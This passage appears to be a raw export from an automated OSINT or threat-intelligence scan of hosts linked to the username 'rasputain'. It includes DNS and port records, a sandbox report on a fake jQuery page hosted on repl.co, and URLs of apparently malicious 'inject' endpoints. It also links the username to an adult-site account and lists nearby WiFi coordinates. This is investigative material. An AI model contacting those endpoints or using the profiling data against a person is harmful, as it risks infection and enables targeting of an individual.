u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://consolegames.down10.software/bios/pcsx2-playstation-2-bios-3"\n Pattern match: "https://consolegames.down10.software"\n Heuristic match: "o.ss2.us"\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: o.ss2.us"\n Heuristic match: "ocsp.rootg2.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootg2.amazontrust.com"\n Heuristic match: "ocsp.rootca1.amazontrust.com"\n Heuristic match: "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwZ%2FlFeFh%2Bisd96yUzJbvJmLVg0%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.rootca1.amazontrust.com"\n Heuristic matc 104.21.28.240 2022-12-18 00:02:50 IP Address No Mnemonic PassiveDNS 0 0 1 0 None 20.195.209.219 misogyny.wtf 2022-12-18 00:21:20 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b12f173862f22a-ORD Content-Encoding: gzip 188.114.97.1 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None xHamster (Category: XXXPORNXXX) https://xhamster.com/users/rasputain rasputain 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None REL (Net ID: 00:02:2D:02:35:63) 37.7803446,-122.3906132 2022-12-18 00:12:09 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.96.0', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.96.0 2022-12-18 00:02:47 Linked URL - Internal No grep.app 1 0 1 0 None http://zerotwo-best-waifu.online/778112985743251/wap/dsc_injection" zerotwo-best-waifu.online 2022-12-18 00:03:12 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-95.w90-116.abo.wanadoo.fr 90.116.166.95 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 7 0 1 0 None garrett.ns.cloudflare.com rasputain.fr 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None webpersonspichincha001--webpichinch.repl.co 34.149.204.188 2022-12-18 00:09:02 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'8443', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c95e97940b24488fe22fafc8fabe4d547cbebe6bbcbebe6bb0974cd4f', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'400 The plain HTTP request was sent to HTTPS port', u'url': u'', u'header': {u'content-length': u'655', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'total-ev-charge.com', u'summary': u'Server: cloudflare\r\nDate: Tue, 15 Nov 2022 09:09:49 GMT\r\nContent-Type: text/html\r\nContent-Length: 655\r\nConnection: close\r\nCF-RAY: -\r\n\nPage title: 400 The plain HTTP request was sent to HTTPS port\n\n\r\n400 The plain HTTP request was sent to HTTPS port\r\n\r\n

400 Bad Request

\r\n
The plain HTTP request was sent to HTTPS port
\r\n
cloudflare
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', u'time': u'2022-11-15T09:09:49.111520616Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731ce17441d7885c1ca501c58ac5134df533e98edc4fb6c791e', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'16', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'188.114.97.1', u'summary': u'Date: Mon, 14 Nov 2022 18:40:45 GMT\r\nContent-Type: text/plain; charset=UTF-8\r\nContent-Length: 16\r\nConnection: close\r\nX-Frame-Options: SAMEORIGIN\r\nReferrer-Policy: same-origin\r\nCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\r\nServer: cloudflare\r\nCF-RAY: 76a1e09d4e479c0c-FRA\r\n\n\nerror code: 1003', u'time': u'2022-11-14T18:40:45.290141174Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc77ba94f4758f84ee6a988ec80f', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'clinic.tanyar.org', u'summary': u'Date: Wed, 16 Nov 2022 20:52:47 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nlast-modified: Tue, 26 Jul 2022 11:45:45 GMT\r\naccept-ranges: bytes\r\nvary: User-Agent\r\nx-turbo-charged-by: LiteSpeed\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ljaOn9MYZGchA5PAB0ShZB1fL9jkH29cOGha88VNVZQYZ0B30L6xIvntAkyJKVUXsLDg%2BWYA0k6M2ic976HQHNh8BIalAyVslDgmg49Al0TUkUQiDVYycXX%2FVg%2FudJ7Akfc1Og%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76b31cc4cac4c399-SEA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n2c\r\nApache is functioning normally\n\r\n0\r\n\r\n', u'time': u'2022-11-16T20:52:46.785091206Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68304a24b27211abd6b5b7e200', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://www.evcharge.totalenergies.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'total-ev-charge.com', u'summary': u'Date: Tue, 15 Nov 2022 09:09:49 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Tue, 15 Nov 2022 10:09:49 GMT\r\nLocation: https://www.evcharge.totalenergies.com/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Gc%2BVDdofvBTUCV9wVYfk4cKJLxr7C2ETUJSjJJ8vyUPMEHFeFRAgf01l0in8H%2FnQxO4h7JAddKdXczicHPMMO0L1GlLxP4JEdaxm%2BfCwZnXgIUc4e9QL9mxDxF%2BUNcTrp4s25LIY"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 76a6d9a68cfc9bb3-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-11-15T09:09:49.165008166Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.1', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'pass 188.114.97.1 2022-12-18 00:04:10 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.96.0 2022-12-18 00:11:26 Raw Data from RIRs No GLEIF 0 0 3 0 None [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'5493007DY18BGNLDWU14'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/5493007DY18BGNLDWU14'}}}, u'attributes': {u'highlighting': u'CLOUDFLARE, INC.', u'value': u'CLOUDFLARE, INC.'}, u'type': u'autocompletions'}] Cloudflare\, Inc. 2022-12-18 00:10:04 BGP AS Membership No URLScan.io 0 0 1 0 None 8075 plague.fun 2022-12-18 00:25:14 Affiliate - IP Address No DNS Look-aside 0 0 3 0 None 81.88.48.112 81.88.48.102 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None default (Net ID: 00:01:24:F0:65:67) 37.780462,-122.390564 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2086 188.114.96.1 2022-12-18 00:06:44 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 16, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://jquery-attribute-selector.barzz12.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:8132:304:WilStaging_02"\n "Local\\SM0:8132:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:5812:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "Local\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5248:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"jquery-attribute-selector.barzz12.repl.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:80"\n "34.149.204.188:443"\n "142.250.72.138:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"jquery-attribute-selector.barzz12.repl.co"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00005812]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Kids Mode\\0.0.0.10\\manifest.fingerprint]- [targetUID: 00000000-00005812]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00005812]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%TEMP%\\5812_2022650426\\shopping_fre.html]- [targetUID: 00000000-00005812]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00005812]\n "cdd6c08f-7c86-4474-902f-afea36c0a1ae.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\cdd6c08f-7c86-4474-902f-afea36c0a1ae.tmp]- [targetUID: 00000000-00008092]\n "7234865e-8eda-42b6-a48f-5804db7147dd.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\7234865e-8eda-42b6-a48f-5804db7147dd.tmp]- [targetUID: 00000000-00008092]\n "Part-DE" has type "data"- Location: [%TEMP%\\5812_2093507271\\Part-DE]- [targetUID: 00000000-00005812]\n "4cc0bbb2-159b-4da8-8031-c70df079b4eb.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4cc0bbb2-159b-4da8-8031-c70df079b4eb.tmp]- [targetUID: 00000000-00005812]\n "9ab92b2b-c351-4c0b-a7b4-fdc0ea840854.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\5812_1664129855\\safety_tips.pb]- [targetUID: 00000000-00005812]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005812]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00005812]\n "2b0d2db4-5b34-4566-8c6f-f51f3122fca3.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00005812]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\5812_2093507271\\Part-NL]- [targetUID: 00000000-00005812]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators with escape sequences"- Location: [%TEMP%\\5812_2022650426\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005812]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\LOG]- [targetUID: 00000000-00005812]\n "14bc75cc-e601-4873-a1de-b4eb75e7acd1.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\14bc75cc-e601-4873-a1de-b4eb75e7acd1.tmp]- [targetUID: 00000000-00005812]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://jquery-attribute-selector.barzz12.repl.co/"\n Pattern match: "http://jquery-attribute-selector.barzz12.repl.co"\n Heuristic match: "jquery-attribute-selector.barzz12.repl.co"\n Heuristic match: "11;cs_.._..._;qL_e__-a1_ribu1e-selec1or.barzz1_.recl.cc"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\5812_2022650426\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00005812]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\5812_2022650426\\edge_driver.js]- [targetUID: 00000000-00005812]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\5812_2022650426\\auto_open_controller.js]- [targetUID: 00000000-00005812]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\5812_2022650426\\edge_tracking_page_validator.js]- [targetUID: 00000000-00005812]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\5812_2022650426\\shoppingfre.js]- [targetUID: 00000000-00005812]\n Dropped file: "shopping.js" - Location: [%TEMP%\\5812_2022650426\\shopping.js]- [targetUID: 00000000-00005812]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\5812_2022650426\\edge_checkout_page_validator.js]- [targetUID: 00000000-00005812]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\5812_2022650426\\shopping_iframe_driver.js]- [targetUID: 00000000-00005812]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\5812_2093507271\\adblock_snippet.js]- [targetUID: 00000000-00005812]\n Dropped file: "product_page.js" - Location: [%TEMP%\\5812_2022650426\\product_page.js]- [targetUID: 00000000-00005812]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Edg/103.0.1264.37'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.28" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.28"\n Potential IP "10.34.0.28" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.28\\LICENSE"'}], u'threat_level': 0, u'size': None, u'job_id': u'63589b8fa166e1316904a3d3', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.149.204.188', u'34.149.204.188', u'142.250.72.138'], u'sha256': u'c658b79bc25120c045777e2590aa021935d8b0b937566361881d297956a7d765', u'sha512': u'6350479333dcf05b973fa3b6c0ab6d87487c3220b42e68365b96a26b4bc0727238c0b753f81fcfe9e95864956d39a57f1062505091a4143a6cea92c351a1330f', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://jquery-attribute-selector.barzz12.repl.co/', u'submission_id': u'63589b8fa166e1316904a3d4', u'created_at': u'2022-10-26T02:29:35+00:00', u'filename': None}], u'analysis_start_time': u'2022-10-26T02:29:36+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 3, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 9, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_secti 34.149.204.188 2022-12-18 00:09:38 Co-Hosted Site No HackerTarget 0 0 2 0 None 19.koongroup.com 172.67.147.230 2022-12-18 00:08:56 Open TCP Port No LeakIX 0 0 2 0 None 188.114.96.0:8080 188.114.96.0 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:8443 172.67.190.129 2022-12-18 00:08:14 Netblock Membership No RIPE 4 0 1 0 None 40.112.0.0/13 40.113.112.131 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 104.21.19.243 2022-12-18 00:07:17 HTTP Headers No Web Spider 1 0 2 0 None {"date": "Sun, 18 Dec 2022 00:07:17 GMT", "content-length": "213", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:25:45 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.96.1] 188.114.96.1 2022-12-18 00:16:58 Web Content No Web Spider 1 0 4 0 None /*! jQuery v3.5.0 | (c) JS Foundation and other contributors | jquery.org/license */ !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.5.0",S=function(e,t){return new S.fn.init(e,t)};function p(e){var t=!!e&&"length"in e&&e.length,n=w(e);return!m(e)&&!x(e)&&("array"===n||0===t||"number"==typeof t&&0+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp(F),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+F),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return 